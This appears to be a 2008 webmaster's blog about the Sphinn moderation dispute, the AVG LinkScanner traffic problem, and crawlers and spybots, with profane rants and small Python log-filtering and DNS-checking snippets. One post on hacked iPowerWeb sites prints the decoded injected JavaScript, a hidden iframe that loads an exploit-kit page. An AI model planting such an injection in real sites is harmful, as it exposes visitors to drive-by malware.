Unfortunately, Sphinn devolved into a bunch of Sphamm and when one of their members pointed out how widespread the problem was they banned Edward. OK, Edward (pageoneresults) can push the envelope a little but it wasn't out of disrespect, he was making a very public spectacle to get them off their dead asses to fix the problem.

So EvilGreenMonkey of Sphinn even admitted Edward was right:

The person highlighted in Aaron's post has had their account terminated, there is no need to interact with them further. The findings highlighted in his comments were not new or truely condemning. Yes, people spam Sphinn - we remove the spam. Yes, submit.php URLs were getting indexed - although from Google indexing WP social media plugin links rather than spamming. Fixes to these problems were either already implemented or scheduled for release before said user started his campaign. I'll make no further comment on this post and suggest that we leave it at that.
So instead of saying "Thank you for bringing it to our attention" and "We're working on the problem" with a proposed implementation date, they just ban him and that's when all hell broke loose in the SEO blogosphere.

Not only that, shouldn't the Sphinn members get an apology from Sphinn for forcing us to suffer through all that Sphamm which one simple NOFOLLOW would've stopped from the beginning?

Perhaps Sphinn bears some of the blame here because if "his comments were not new or truely condemning" then you allowed the situation to continue unabated until one of your members simply couldn't take it anymore.

So Sphinn members had to put up with Sphamm for a year and not even a simple apology but they shot the messenger that finally snapped, good going Sphinn.

Right on the heels of this they decide to take a swipe at Kimberly Bock and threatened to ban her for some hypocritical horseshit.
1. Your flame post submitted by another user, which went Hot on Sphinn, was removed due to 26 Desphinns and many complaints.
2. The posts about your personal life had no internet marketing relevance and are seen as off-topic/spam.
So let's review Kimberly's plight: she was a) threatened over a post that someone else submitted to Sphinn and b) told that 2 SEOs getting married isn't news.

Holy mother of horseshit, have they lost their minds?

I find their current heavy handed reputation management tactics too autocratic to support Sphinn anymore, simply because the good of the community isn't being served when criticism is swept under the rug and squelched instead of addressed.

The Sphinn button is off my site because I certainly wouldn't want to be associated with all the vapid top 10 lists being submitted and I sure as hell don't want someone yelling at me about material on my site not being suitable in the event someone else Sphinns it, such as happened to Kimberly.

Maybe someday if Sphinn gets their act together and stops shooting the messengers and they improve the quality of their content, the SphinnIt button will return.

Until that day, SphuckIt!

Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on * which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at which APNIC claims to be out of Hong Kong which has a San Francisco mailbox according to their website.

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...

Tuesday, June 17, 2008

AVG 8 LinkScanner Fiasco Recap

For those of you that might've missed the whole AVG 8 LinkScanner disaster and ensuing AVG reputation nightmare, here's a quick recap and links to places to read all the details.

Webmasters started noticing a rash of distributed IPs with the same user agent, no referrer, and a few other technical issues I won't go into now, that suddenly started pounding their sites:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
At first I thought it looked like a botnet scraper but soon someone figured out it was related to the new release of AVG 8 that included a LinkScanner that was amusingly called "Safe Search" which is now not-so-safe since everyone knows how to spoof it.

The story was first broken on WebmasterWorld, then again on The Register, then a follow up on WebmasterWorld and a few other places. The best part of the story on The Register actually unfolds in the comments section which is now over 200 posts but has some good comments if you're willing to wade through it all.

It appears this Safe Search link scanning was a knee jerk reaction to McAfee's SiteAdvisor. SiteAdvisor uses stale search results to flag sites with known exploits. However, Safe Search, much to everyone's dismay, hits all sites in real-time to check for exploits for every single search. The most amusing aspect is that the very AVG feature which is supposed to make the internet safer has been attacking sites and become malware itself.

Here's a list of all the major points so far:

1. AVG 8 appears to be causing an escalating DDoS attack as more and more AVG users upgrade causing some sites to be hit by many thousands of unique IPs per day.

2. AVG's Safe Search is causing webmaster analytics worldwide to be totally skewed unless you filter out the ";1813" user agent.

3. AVG 8 is exposing their customer information to sites their customers didn't even visit and potentially setting them all up for some future exploit. They'll be targets for direct marketing to switch to a new AV product at a minimum with savvy affiliates making out like bandits.

4. The Safe Search link scanner has the potential to automatically access sites that aren't allowed at work, could violate your ISP's AUP or be illegal in some jurisdictions. This could result in reprimand, losing your ISP or potentially being flagged in honeypot sites for illicit activities.

5. The malicious sites can already fake the Safe Search code which appears to put users of the free AVG 8 at risk. The risk is because you only get Safe Search, the link scanner which is being spoofed, but you don't get Safe Surf, which stops HTML exploits as you load the page. It appears you need a paid version of AVG 8 to actually be protected from online exploits so be careful where you surf using the free version of AVG 8.
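Point 2 in the list above boils down to dropping every hit whose user agent carries the ";1813" tag before the numbers reach your stats. Here's a minimal Python sketch of that filter. It assumes combined-format access log lines where the user agent is the last quoted field; the function names and the sample lines are made up for illustration and aren't taken from any analytics package.

```python
import re

# Assumption: combined log format, where the user agent is the final quoted field.
UA_FIELD = re.compile(r'"([^"]*)"\s*$')

# The marker reported at the end of the AVG 8 LinkScanner user agent.
AVG_MARKER = ";1813)"


def is_avg_linkscanner(log_line: str) -> bool:
    """Return True when the line's user agent ends with the ;1813 marker."""
    match = UA_FIELD.search(log_line)
    return bool(match) and match.group(1).endswith(AVG_MARKER)


def strip_linkscanner_hits(lines):
    """Keep only the lines that did not come from the LinkScanner user agent."""
    return [line for line in lines if not is_avg_linkscanner(line)]


# Hypothetical sample lines (192.0.2.x is a documentation-only address range).
SAMPLE = [
    '192.0.2.10 - - [17/Jun/2008:10:00:00 -0700] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"',
    '192.0.2.11 - - [17/Jun/2008:10:00:01 -0700] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
]

if __name__ == "__main__":
    for line in strip_linkscanner_hits(SAMPLE):
        print(line)
```

Since the string is trivial to fake, this is only good for cleaning up stats and shouldn't be mistaken for a security check.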

Well, that's the recap in a nutshell.

This just goes to show you how the best intentions can have disastrous results when people don't think about the consequences of their actions, especially when dealing with an installed base of this scale.

Thursday, May 22, 2008

Did CSC's Spybot Get Caught?

Looks like yet another corporate compliance spybot is hitting our servers, not like we need yet another spybot.

There's only one IP out of this entire range that consistently hits my servers.

OrgName: Corporation Service Company
NetRange: -

They claim to crawl the web:

Our proprietary technology scans and digests web pages, images and other Internet content around the clock to locate critical occurrences of online brand abuse.
Yet again, nobody has ever seen a crawler name in use so I'll hazard a guess it doesn't read or respect robots.txt when it's crawling, or possibly trespassing, on our servers.

I'd post more about the specifics on this one but I really don't want them to wise up too much because some of the things their crawler does, while pretending to be a browser, trips several alarms in my bot blocker.

Kind of hard to digest web pages when you're busy digesting error pages instead!

Just another day of the internet version of Spy vs Spy.

Monday, May 12, 2008

Impact On Your Bandwidth Will Be Minimal My Ass

How often do we see that happy line of horse shit spread by every new startup that crawls the web about how minimal its impact will be?

Every fucking one of them claims it but when you add them all together the bot traffic is quickly exceeding the human traffic.

Who the fuck am I kidding, on most sites the bots clearly outnumber the humans in pages read on a daily basis.

First we put the big search engines on top of the heap with Google, Yahoo and MSN crawling the crap out of your servers daily. Just the three of these guys can easily read as many pages as 10K visitors a day. Then throw in the wannabe search engines like Ask, Gigablast, Snap, Fast, etc. ad nauseam and it's over the top.

Now expand that list to include the international search engines like Baidu, Sogou, Orange's ViolaBot, Majestic12, Yodao, and on and on, tons of 'em.

Then we have all the spybots that feel entitled to crawl your site like Picscout, Cyveillance, Monitor110, Picmole, RTGI, and on and on.

Next add up all the specialty niche bots like Become, Pronto, OptionCarriere, ShopWiki, and all sorts of shit too numerous to mention.

Pile on top of this all the free fucking tools that every little shithead and make believe company uses to scrounge the 'net for god knows what, and god's not telling, like Nutch and Heritrix, plus the web downloaders, offline readers, and more.

Don't forget, many of these so-called search engines and shit now want screen shots as well so after they crawl your page they send a copy of Firefox or something to your site to download every page again plus every fucking image, never cached, over and over and over.

Did I forget to mention directories?

They'll want to link check you and get screen shots as well, don't leave them out or they'll feel fucking neglected.

Wait, there's more, those social sites like Eurekster, Jeteye, etc. that let people link to your shit and then come back banging on your site all the time to make sure that shit's still valid.

Then add up all the RSS feed readers and aggregators that pull down your RSS feeds that nobody ever fucking reads. Not to mention the RSS feed finders like IEAutodiscovery that run amok on your site just looking for RSS feeds ... FUCK!

If you run affiliate programs you have CJ quality bot or some shit hitting your site and if you run ads then the Google quality bot, it's always something.

Don't forget the assholes running the dark underbelly of the web with all the scrapers, spam harvesters, forum, blog and wiki spammers, botnets and other malicious shit pounding on our sites daily.

Add on top of all this shit Firefox, Google Web Accelerator and now AVG's toolbar all pre-fetching pages that will most likely never be read and holy shit, we're being swamped!

OK, now that we've identified all this bot traffic, where's all the fucking people?

Of course you think all those hits from MSIE and Firefox are people, right?

Hell no!

Are you out of your fucking mind?

Those hits are the scrapers, screen shot makers and companies like Cyveillance and Picscout that don't want you to stop them from crawling your site so they just pretend to be humans to get past the bot blockers.

Well guess what?

There are no fucking people on your site. The internet is now run for and used exclusively by bots.

Apparently you missed the memo.

Comparing Effectiveness of Anti-Virus Web Protection Methods

There are three basic methods being used at the moment to protect web surfers from potential dangers: static (stale), active and passive.

Static Web Protection

Various companies use the static method, which relies on crawling the web in advance to find vulnerabilities and then warning visitors about these problems as they are about to visit a web site. McAfee's SiteAdvisor and Google both take this approach and it's obviously only as good as your last scan, and the malware can easily be cloaked and hidden from these somewhat obvious crawlers. Besides easily being fooled with cloaking, the data is always stale, meaning sites good even 10 minutes ago could now be infested with malware and sites previously infested could have been cleaned.

This method isn't optimum for anyone and can be a nightmare for websites tagged as bad to get off the warning list assuming they ever find out they're on it in the first place as their business goes down in flames from traffic going elsewhere.

Active Web Protection

The latest AVG 8 includes a Link Scanner and AVG Search-Shield which aggressively checks pages in Google search results that you're about to visit in real time to help protect the surfer. Unfortunately, AVG made several mistakes, some that could be deemed fatal flaws, which allow this technology to be easily identified so that malware and phishing sites can easily cloak to avoid AVG's detection. Even worse for webmasters is that AVG pre-fetches pages in search results and as adoption of this latest AVG toolbar increases, it is quickly turning into a potential DoS attack on popular sites that show up at the top of Google's most popular searches.

While I think AVG's intentions were good, their current implementation easily identifies every customer using their product and causes webmasters needless bandwidth issues that could be easily resolved on their part with a cache server.

Passive Web Protection

The method used by Avast's Anti-Virus is to use a transparent HTTP proxy, meaning that all of your HTTP requests pass through an invisible intermediate proxy service that scans for potential problems in the data stream in real-time. The data is always fresh, checked in real-time, the user agent doesn't change and there are no pre-fetches or needless redundant hits on websites.

The only downside is you don't know the site is bad in advance but that can easily be the case with static protection due to stale data and/or cloaking and active protection due to cloaking.

The Best of All

While the three approaches all have their potential problems it appears a combination of all three is probably the best approach.

Bad Site Database:
The SiteAdvisor/Google type database approach is good to log all known bad sites so they don't get a second chance to fool the other methods with cloaking once they are caught. This cuts down on redundantly checking known bad sites until the webmaster cleans it up and requests a review to clear their site's bad name.

Perhaps the Bad Site database concept needs to become a non-profit dot org so that all of the anti-virus companies can freely feed and use this database without all the corporate walls built up around the ownership of the data for the greater good, something like a SpamHaus type of thing or perhaps merged into SpamHaus.

Optimized Pre-Screening:
The AVG approach of pre-screening a site could be optimized by fixing the toolbar's user agent so it's not detectable and using a shared cache server to avoid behaving like a DoS attack on popular websites. The beauty is that the collective mind of all these toolbars with an undetectable user agent avoids the cloaking used to thwart detection associated with known crawlers. If the toolbar fed the results of these bad sites to the Bad Site Database, then there's a win-win for everyone.

Transparent Screening:
The final approach used by Avast should still be performed, which is the HTTP proxy screening, so that any site that manages to not be in the bad site database and still eludes the active pre-screening of pages would hopefully get snared as the page loads into the machine.


When you pile up all of this security the chances of failure still exist but the end user is protected and informed as much as humanly possible from all of the threats present.

It would certainly be nice to see some of the anti-virus providers combine their efforts as outlined above to make the internet a safer place to visit.

Sunday, April 27, 2008

Off By More Than One

Can you believe that someone is actually surfing the web using some free browser called Off By One that doesn't appear to have been updated in the last 2 years?

The user agent is as follows:

"Mozilla/6.0(compatible;OffByOne;Windows 2000)"
The irregular formatting convention triggered the bot trap with the lack of spaces alone.

Then it claims to be Mozilla 6.0 when it's probably Mozilla 3.0 at best.
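For anyone curious what a "lack of spaces" check might look like, here's a rough Python sketch. It is not the actual bot trap rule, just a guess at the idea: the two patterns assume the usual "Mozilla/x.y (compatible; ...)" layout with a space before the parenthesis and after each semicolon, and the function name is made up for illustration.

```python
import re

# Assumption: mainstream browsers write "Mozilla/x.y (token; token; ...)"
# with a space before "(" and a space after every ";".
MISSING_SPACE_BEFORE_PAREN = re.compile(r"^Mozilla/\d+\.\d+\(")
MISSING_SPACE_AFTER_SEMICOLON = re.compile(r";(?=[^\s)])")


def looks_irregular(user_agent: str) -> bool:
    """Flag user agents whose spacing differs from the common browser layout."""
    return bool(
        MISSING_SPACE_BEFORE_PAREN.search(user_agent)
        or MISSING_SPACE_AFTER_SEMICOLON.search(user_agent)
    )


if __name__ == "__main__":
    for ua in (
        "Mozilla/6.0(compatible;OffByOne;Windows 2000)",
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    ):
        print(looks_irregular(ua), ua)
```

A heuristic like this will flag the occasional legitimate oddball browser too, which is exactly what happened here, so it's better used to raise a score than to ban outright.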

Considering how few times, if ever, that this browser has visited it's obviously very rare.

Maybe some online nerd activist will get it declared as an endangered online species so it will become protected by law.

Don't laugh, you know it'll happen eventually...

Sunday, April 20, 2008

Reciprocal Link Exchange? Let's Swap!

For years I've been deleting all those emails asking me to exchange links and I won't swap links with any of that crap.

Suddenly I've had an epiphany and YES!, now I'll swap links with you, no problem!

I'm only agreeing to swap links as requested.

I'm not using NOFOLLOW on those links as requested.

You can see my links when you visit, online and visible as agreed.

Unfortunately my link swapping page will never be seen by Google, Yahoo, MSN or any other search engine but you'll see it just fine.

I'm going to hold up my end of the bargain, we swapped links, how about you?

Kaushik, What Freaking Experiments?

I found this user agent coming out of Microsoft's Area 131 requesting that people "contact kaushik for these experiments" that kept hitting one of my servers. "contact kaushik for these experiments"
So I did a little data mining of my own and searched Microsoft and couldn't decide if this experiment was from Kaushik #1 or Kaushik #2.

Both Kaushiks appear to be working for the Data Management, Exploration and Mining Group (DMX) at Microsoft, but which one ran this experiment?

OK, will the real Kaushik running these experiments please stand up?

BTW, was your experiment finding sites running bot blockers?

If so, you succeeded and your requests were stopped. ;)

DNS Right But User Agent Wrong

Ran into a user agent from DNSRight today that claimed to be some link check tool that doesn't appear on their site. "GET / "
"" " WebBot Link Ckeck Tool. Report abuse to:"
So I ran some of their other tools that don't identify themselves at all. "GET / HTTP/1.1" "-" "-"
They host this mess at so just block 'em.
OrgName: California Regional Intranet, Inc.
NetRange: -
No more DNS Right or Left, it's now DNS Gone.

Thursday, April 17, 2008

Picmole, Yet Another Spybot!

There must be good money spying on everyone because it seems a new company springs up almost weekly trying to claim their stake in this new gold rush.

How many fucking spybots do we need?

Today on the spybot circuit we're serving up a helping of Picmole that's using heritrix to do its crawling. Surprisingly it still checks robots.txt but who knows if they'll honor it down the road because honoring robots.txt conflicts with accomplishing their stated goals.

Identifying their spider properly and crawling from easily identifiable IPs will also present them problems as their activities increase but being a new service they'll soon figure that out and probably go stealth like all the rest. [] requested 1 pages as "Mozilla/5.0 (compatible; heritrix/1.12.0 +"
Sorry, but your bot hit a firewall on your first attempt.

Abort, Retry, Ignore?

Favcollector Bandwidth Waster

Here's another product of Canada doing the stupidest shit ever seen, collecting favicons.

It came and grabbed my icon, then hit the home page which the bot blocker promptly stopped, so who knows what else it would've done beyond that. [] "Favcollector/2.0 ("
From their FAQ:
Favcollector is a spider that searches the internet for favicons. It downloads and stores these favicons for each site it visits. It will go back once a month to see if the favicon has changed and will download the new icon if it is has, effictivly creating an archive of all favicons on the internet.

Spider my ass...

Spiders ask for robots.txt files, read them, and go away.

Not this piece of shit as it just comes and it takes what it wants without regard to the webmaster's wishes.

Not only that, a bunch of trademarked icons are now on their site without permission which will most likely make some crazed trademark enforcers start jumping up and down once they find that site.

BTW, run a damn spell checker on your site as the word is effectively, not "effictivly" unless that's the Canadian spelling.

Canasasearchbot For Canasians, Oh Canasa!

It's hard to resist commenting on a bot that can't even spell its own name or its country name correctly. [] "canasasearchbot("
However they got it right on their robots page:
User-agent: canadasearchbot
It did ask for robots.txt but who knows if it was looking for "canasasearchbot" or "canadasearchbot", total crap shoot.
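To show why the spelling matters, here's a small Python sketch using the standard library's `urllib.robotparser`. The robots.txt content is a hypothetical one that blocks the documented token, and `allowed` is just a helper name for this example. How their crawler actually matches its name is unknown, so this only shows what a stock parser does with the two spellings.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt that blocks the token documented on the bot's robots page.
ROBOTS_TXT = """\
User-agent: canadasearchbot
Disallow: /
"""


def allowed(token: str, path: str = "/index.html") -> bool:
    """Ask a standard robots.txt parser whether this token may fetch the path."""
    parser = RobotFileParser()
    parser.parse(ROBOTS_TXT.splitlines())
    return parser.can_fetch(token, path)


if __name__ == "__main__":
    # The documented token is blocked by the rule above.
    print("canadasearchbot allowed:", allowed("canadasearchbot"))
    # The token the crawler really sends matches no rule, so it falls through.
    print("canasasearchbot allowed:", allowed("canasasearchbot"))
```

In other words, a webmaster who blocks the name from the robots page may not be blocking the thing that's really in the logs, so list both spellings if you want it gone.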

I tried their little search engine and it took it a really long time to come back with some really bad results.

Here's a "search tip", try searching your log file and examine what your crawler is putting in that log file before turning it loose on the world.

Nothing like that fine Canadian quality, eh?

Monday, April 14, 2008

Mozshot Tries Taking a Screenshot

Yet another Firefox-based screen shot tool hit my other site today just in time to take a screen shot of an error message telling them they weren't allowed to take screen shots without permission.

Details: []
"Mozilla/5.0 (Gecko/20070310 Mozshot/0.0.20070628;"
This thing appears to be open source, oh joy...

Friday, April 11, 2008

RTGI - The French Social Media Spybot

Yet another social media mining operation designed to track every bit of intel said about brands, people, politics and more.

From a translation of their site:

Our solutions simplify the identification of influential communities and monitoring of their conversations, to the benefit of businesses, communication agencies or research institutes.

RTGI's approach allows the analysis of the links and content generated by the citizens, journalists, consumers or activists, to draw the contours of communities conversations around your issues, brands and products and their real impact on your image online. RTGI have elaborated the linkfluence to give a unit of reliable measurement of the influence of the social web sites.
The highlighting was added to help you see how it facilitates spying on your ass without going to much effort to do so.

Heck, the French government is in their list of clients!
  • Information Service (GIS) government
  • Ministry of the Economy, Finance and Employment
  • Picardy Regional Council (RENUPI)
Sheesh, didn't need to translate as they have an English .EU version too.

Oh well, I'm not rewriting it!

Continuing on...

George Orwell obviously didn't anticipate the internet and he was off by a few years, 24 to be exact, but his overall message of Big Brother watching us in 1984 is finally coming true in 2008.

Anyway, back to the details:
"mozilla/5.0 (compatible; RTGI;"
The IPs they operate from are: -> -> -> -> ->
The old address of doesn't appear to be active since 04/13/2007 so I probably wouldn't worry about that too much unless you just want to block that dedicated hosting range for good measure.
inetnum: -
netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Paris, France
The dedicated host they currently use has this range of IPs:
inetnum: -
netname: OVH
descr: OVH SAS
descr: Dedicated Servers
So there you go, another way to make your site part of the anti-social media by keeping the snoops out.

Project Rialto's PRCrawler Is Data Mining?

Since I whitelist allowed bots I've had Project Rialto blocked since the beginning but I was curious what they were doing since they first showed up on my radar on 01/23/2008 and kept coming back over and over.

From one of their job ads:

We are designing high-performance algorithms and developing reliable, fault-tolerant and scalable real-time systems that can handle massive volume of data for in-depth analysis of user behavior to enable targeted advertising.


Research and investigate academic and industrial data mining, machine learning and modeling techniques to apply to our specific business case
Oh boy!

It appears they want to crawl our sites and use that information to shove more ads in our face.

Somehow, I don't think so...

If you're going to mine data, shouldn't you get the URLs right?

The site they're attempting to "mine" is on a Linux box where URLs are case sensitive, and my URLs all have upper/lower case in them, yet the PRCrawler only asks for those URLs in all lower case so even if I let them crawl my site they'd get nothing but 404s.

No wonder their home page says they're a "stealth company" because I'd hide too if I couldn't even get the proper case of the URLs right.

Here's their user agent:
"PRCrawler/Nutch-0.9 (data mining development project;"
They operate from the following IPs:
The first two were from, the rest are all from
I haven't seen anything from since the initial contact but that's only 2 months ago so who knows.

Don't know where they primed the pump for their data mining operation since they already had lots of information about my site when they attempted to crawl, but since it was all lower case it was completely useless.

I'm just curious if they got my URLs from somewhere already in lower case or someone there slapped a tolower() around a line of code when importing the URLs into Nutch.
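If it was the tolower() theory, the bug is easy to picture. Here's a Python sketch contrasting a blanket lower-case with a normalization that only touches the parts of a URL that are case-insensitive. The function names and the example.com URL are made up for illustration, and this is not a claim about what Nutch or PRCrawler really does.

```python
from urllib.parse import urlsplit, urlunsplit


def lowercase_everything(url: str) -> str:
    """The suspected mistake: lower-casing the whole URL, path included."""
    return url.lower()


def normalize_safely(url: str) -> str:
    """Lower-case only the scheme and host; leave the path and query alone.

    Assumption: the URL carries no user:password@ part, which would also be
    case sensitive and should not be lower-cased.
    """
    parts = urlsplit(url)
    return urlunsplit(
        (parts.scheme.lower(), parts.netloc.lower(), parts.path, parts.query, parts.fragment)
    )


# Hypothetical mixed-case URL of the kind served from a case-sensitive file system.
ORIGINAL = "HTTP://WWW.Example.COM/Widgets/BlueWidget.html"

if __name__ == "__main__":
    print(normalize_safely(ORIGINAL))      # path keeps its case
    print(lowercase_everything(ORIGINAL))  # path no longer matches the file on disk
```

On a case-sensitive server the second form asks for a file that doesn't exist, which is how you end up with a crawl made entirely of 404s.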

Don't know, don't care, it's amusing either way.

Good luck with Project Rialto, you're going to need it.

Wednesday, April 09, 2008

Radian6's R6_FeedFetcher Fetching More Than Feeds

For those of you unfamiliar with Radian6 it's a "social media monitoring tool" because apparently everyone with an opinion on the internet needs someone to spy on their ass since we're disruptive.

Well bummer.

Isn't it a shame the good old days are gone where companies told you everything you needed to know about their brand and you had to be a journalist just to get your opinion heard?

Of course those so-called journalists never gave you their real opinion because of fear of losing advertisers so it was all candy coated bullshit that just bordered on the truth because advertisers couldn't handle the truth fearing nobody would buy their shit.

Tough shit and god bless the great equalizer called the Internet that leveled the playing field between consumers and companies so we can find out what's really going on without everything being filtered through the company spin doctor.

Their crawler details are: "R6_FeedFetcher("
The amusing thing about the R6_FeedFetcher is I never see it fetching the feed, instead it's trying to fetch pages linked from the feed, which is what we call a crawler and not a fucking feed fetcher.

Does it read robots.txt to see if it's allowed beyond my RSS feed?

Fuck no.

I looked at all accesses on my RSS feed and didn't see anything obvious so maybe they get RSS feeds from FeedBurner or something similar, who knows.

Anyway, it's blocked now on my other site so I can be as disruptive as I want there.

However, who wants to place bets that this disruptive post will be monitored?

P.S. The site R6_FeedFetcher is blocked on is not this blog for first time readers ;)


After doing some research it appears they also have the following user agent:
Also, read this interesting post about Radian6 on Simon's blog.

Friday, April 04, 2008

Discovery Engine's Discobot Discovered My Bot Blocker

I found this little Discobot from Discovery Engine trying to dance around on my server but the bot blocker bouncer at the door was already keeping him behind the velvet ropes.

Here's a sample of what I saw on my site: "GET /robots.txt"
"Mozilla/5.0 (compatible; discobot/1.0; +"
"Mozilla/5.0 (compatible; discobot/1.0; +"
It does honor robots.txt just like they said it did but it cached it for about 48 hours between visits.

They were nice enough to provide the range of IPs it uses: -
Those IPs are from Servepath which I already block.

Between whitelisting allowed bots and blocking more data centers than I'd care to admit, this poor little Discobot didn't stand a chance to discover anything.
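The whitelist plus data center combination can be sketched in a few lines of Python. Everything named here is an assumption for illustration: the whitelist tokens, the bot hint substrings, and the network ranges, which are documentation-only addresses standing in for real hosting ranges. It's a toy version of the idea, not the real bot blocker.

```python
import ipaddress

# Hypothetical whitelist of crawler tokens that are allowed in.
ALLOWED_BOT_TOKENS = ("googlebot", "slurp", "msnbot")

# Hypothetical data center ranges (RFC 5737 documentation networks as stand-ins).
BLOCKED_NETWORKS = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]

# Substrings that suggest an automated client; an assumption, not a complete list.
BOT_HINTS = ("bot", "crawler", "spider", "slurp")


def decide(ip: str, user_agent: str) -> str:
    """Return "block" or "allow" for one request."""
    address = ipaddress.ip_address(ip)
    # Anything coming out of a blocked hosting range is refused outright.
    if any(address in network for network in BLOCKED_NETWORKS):
        return "block"
    ua = user_agent.lower()
    # Self-declared bots get in only if they are on the whitelist.
    if any(hint in ua for hint in BOT_HINTS):
        return "allow" if any(token in ua for token in ALLOWED_BOT_TOKENS) else "block"
    # Everything else is treated as a browser at this stage.
    return "allow"


if __name__ == "__main__":
    print(decide("192.0.2.55", "Mozilla/5.0 (compatible; discobot/1.0)"))
    print(decide("203.0.113.9", "Mozilla/5.0 (compatible; Googlebot/2.1)"))
```

A new bot like this one fails twice: once for not being on the whitelist and again for crawling from a hosting range. A whitelisted name alone still proves nothing, since user agents can be spoofed.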

Call back when you're all grown up and ready to send traffic.

Persaibot - The Rude Crawler

I saw this little Persaibot hit my site today without even looking at robots.txt and their website has the balls to say:

Persai uses this bot to crawl the web. It's probably the nicest bot with the greatest personality in the world. Seriously, give it some attention.
Exactly how nice can a bot be that doesn't read robots.txt?

Did you read it and cache it some other day?

Doesn't matter, that was more than 24 hours ago, read it again.

I checked my logs from yesterday, it didn't read it then either and Persai hadn't visited my site in about a month before that.

I'm sorry, you have made a huge faux pas in robot rudeness.

Here's the intel I have on this little bot: []
"PersaiBot/2.1-dev3a (Persai web crawler;; bot at persai dot com)" []
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +" []
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +"
Now the true irony here is that the CEO of Persai posted on his blog complaining about another search engine called Spock scraping every little bit of data about him but at least Spock claims to honor robots.txt.

Must be a karma thing ;)

DART Agent - Another Annoying Distributed Tool

This little annoying DART thing that keeps bouncing off my web site appears to be written by CRS4, the Center for Advanced Studies, Research and Development in Sardinia.

It would appear DART stands for "Distributed Agent-based Retrieval Tools" and they even have a workshop in '06 about this damn thing touted as "The Future of Search Engines' Technologies" that had people from Yahoo!, Google, Quaero and Ask attending.

Here's a sample of some IPs it operates from and the shitload of versions this thing has:
"DART Agent, version 1.2 (build 14062007)"
"DART Agent, version 1.2.7 (build 27062007)"
"DART Agent, version 1.4 (build 17102007)"
"DART Agent, version 1.4 (build 29102007)"
"DART Agent, version 1.4.1 (build 05112007)"
"DART Agent, version 1.4.2 (build 08112007)"
"DART Agent, version 1.4.3 (build 15112007)"
"DART Agent, version 1.4.3 (build 19112007)"
"DART Agent, version 1.4.4 (build 05122007)"
"DART Agent, version 1.4.5 (build 06122007)"
"DART Agent, version 1.4.6 (build 14012008)"
"DART Agent, version 1.4.6 (build 14012008)"
"DART Agent, version 1.4.7 (build 24012008)"
"DART Agent, version 1.4.8 (build 04022008)"
"DART Agent, version 1.5 (build 08022008)"
"DART Agent, version 1.5.1 (build 14022008)"
"DART Agent, version 1.5.2 (build 18022008)"
"DART Agent, version 1.5.5 (build 27022008)"
"DART Agent, version 1.5.6 (build 28022008)"
"DART Agent, version 1.5.6 (build 28022008)"
"DART Agent, version 1.5.1 (build 14022008)"
"DART Agent, version 1.5.7 (build 05032008)"
"DART Agent, version 1.5.2 (build 18022008)"
"DART Agent, version 1.5.8 (build 06032008)"
"DART Agent, version 1.5.8 (build 06032008)"
"DART Agent, version 1.5.8 (build 06032008)"
"DART Agent, version 1.5.9 (build 19032008)"
"DART Agent, version 1.5.8 (build 06032008)"
"DART Agent, version 1.5.9 (build 20032008)"
"DART Agent, version 1.5.8 (build 06032008)"
"DART Agent, version 1.5.8 (build 06032008)"
"DART Agent, version 1.6 (build 02042008)"
"DART Agent, version 1.5.8 (build 06032008)"
"DART Agent, version 1.6.0 (build 02042008)"
Looks like so far it's only operating out of Italy, and they're nice enough to provide reverse DNS when it operates off their servers "" and even another source "", so the crawler could be verified there. Other sources such as "" couldn't be verified, so it's going to be a problem child for anyone that wants to let it play but make sure it's not being spoofed.
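Verifying a crawler by reverse DNS usually means a forward-confirmed lookup: resolve the IP to a hostname, check that the hostname ends in a domain you trust, then resolve that hostname back and make sure the original IP is in the answer. Here's a minimal Python sketch of that idea. The function names are made up for illustration and `example.org` is a placeholder, not one of DART's real hosts; the lookups are passed in as parameters so the logic can be tried without touching the network.

```python
import socket
from typing import Callable, Iterable, List


def reverse_lookup(ip: str) -> str:
    """PTR lookup: IP address -> primary hostname."""
    return socket.gethostbyaddr(ip)[0]


def forward_lookup(host: str) -> List[str]:
    """A lookup: hostname -> list of IPv4 addresses."""
    return socket.gethostbyname_ex(host)[2]


def is_verified_crawler(
    ip: str,
    trusted_suffixes: Iterable[str],
    reverse: Callable[[str], str] = reverse_lookup,
    forward: Callable[[str], List[str]] = forward_lookup,
) -> bool:
    """Forward-confirmed reverse DNS check (IPv4 only in this sketch)."""
    try:
        host = reverse(ip).rstrip(".").lower()
    except OSError:  # no PTR record, lookup failure, timeout
        return False
    suffixes = [s.lower().lstrip(".") for s in trusted_suffixes]
    if not any(host == s or host.endswith("." + s) for s in suffixes):
        return False  # resolves, but not to a domain we trust
    try:
        return ip in forward(host)  # the hostname must point back at the IP
    except OSError:
        return False
```

Something like `is_verified_crawler("192.0.2.10", ["example.org"])` would then separate the real thing from a spoofed user agent, and anything without working reverse DNS simply fails the check.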

Just what the web needs, more distributed web technology to bug the fuck out of webmasters just trying to scratch out a living on the internet.

Oh well, it can't play on my server so what the hell do I care anyway!

Saturday, March 29, 2008

WHO is Scraping My Site!

Note the lack of a question mark in the title because this wasn't a question about "WHO?" but an actual statement about "WHO!" and by that I mean the WHO as in an office of the World Health Organization.

It registered 411 page requests from an IP which is a non-portable address assigned to the WHO Representative Office in Sri Lanka.

